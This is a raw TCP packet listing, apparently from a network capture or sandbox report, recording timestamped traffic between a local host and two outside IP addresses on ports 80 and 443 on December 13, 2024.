                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.674607038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.674622059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.675642967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.675689936 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.675942898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.675986052 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.676673889 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.676717997 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.709741116 CET44349770116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.709904909 CET49770443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.710375071 CET49770443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.710386038 CET44349770116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.712994099 CET49770443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.713002920 CET44349770116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.812663078 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.812680960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.812706947 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.812728882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.812792063 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.812819004 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.813699961 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.813719034 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.813743114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.813766956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.814673901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.814721107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.814755917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.814774036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.814795971 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.814815044 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.815787077 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.815838099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.815860987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.815901041 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.817667007 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.817697048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.817714930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.817737103 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.817950010 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.817997932 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.818943024 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.818989038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.819365978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.819412947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.820102930 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.820137978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.820149899 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.820173025 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.820198059 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.820240021 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.822165966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.822180986 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.822213888 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.822227001 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.822969913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.822984934 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.823016882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.823029995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.825464964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.825485945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.825508118 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.825516939 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.825525045 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.825525999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.825542927 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.825556993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.825557947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.825591087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.826313972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.826355934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.826731920 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.826750994 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.826778889 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.826788902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.827817917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.827866077 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.828494072 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.828540087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.829082012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.829096079 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.829123974 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.829142094 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.829937935 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.829982996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.830542088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.830589056 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.830987930 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.831032038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.831729889 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.831773996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.832804918 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.832847118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.833138943 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.833187103 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.833903074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.833918095 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.833945990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.833961964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.834686995 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.834744930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.835074902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.835125923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.835365057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.835405111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.835587978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.835639954 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.836464882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.836505890 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.836761951 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.836821079 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.837518930 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.837574959 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.837811947 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.837863922 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.838582993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.838633060 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.839489937 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.839544058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.840487957 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.840506077 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.840534925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.840555906 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.840795040 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.840815067 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.840852022 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.840914965 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.842176914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.842195988 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.842221022 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.842240095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.843350887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.843374014 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.843394041 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.843410969 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.843996048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.844047070 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.844981909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.845031023 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.845115900 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.845160961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.846683979 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.846699953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.846738100 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.846749067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.846946001 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.846995115 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.847363949 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.847410917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.848057985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.848102093 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.848859072 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.848881960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.848906040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.848917961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.849931002 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.849948883 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.849972963 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.849986076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.850883961 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.850924969 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.851715088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.851733923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.851752996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.851758003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.851768017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.851800919 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.853131056 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.853174925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.853811979 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.853833914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.853849888 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.853856087 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.853873968 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.853892088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.855381012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.855403900 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.855424881 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.855437040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.856400013 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.856441975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.857429028 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.857450962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.857470989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.857471943 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.857486963 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.857511997 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.858165979 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.858289003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.859394073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.859414101 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.859436035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.859441042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.859456062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.859476089 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.860466003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.860513926 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.861706972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.861726999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.861749887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.861752987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.861761093 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.861788034 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.862664938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.862711906 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.863838911 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.863859892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.863882065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.863882065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.863890886 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.863912106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.866969109 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.866991997 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.867011070 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.867012024 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.867031097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.867032051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.867041111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.867054939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.867067099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.867089987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.867366076 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.867409945 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.868036985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.868074894 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.869096041 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.869136095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.004159927 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.004261971 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.004514933 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.004571915 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.004746914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.004766941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.004793882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.004811049 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.005491972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.005543947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.005723953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.005770922 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.006517887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.006570101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.007018089 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.007065058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.007612944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.007659912 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.008013964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.008063078 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.008742094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.008757114 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.008790016 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.008802891 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.009774923 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.009824991 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.010369062 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.010415077 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.010874033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.010920048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.011369944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.011440039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.011982918 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.012038946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.012516975 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.012562990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.013180971 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.013232946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.013493061 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.013539076 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.014242887 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.014287949 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.014491081 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.014571905 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.015208006 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.015253067 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.015467882 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.015532017 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.016390085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.016438007 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:20.016891003 CET804976331.41.244.11192.168.2.4
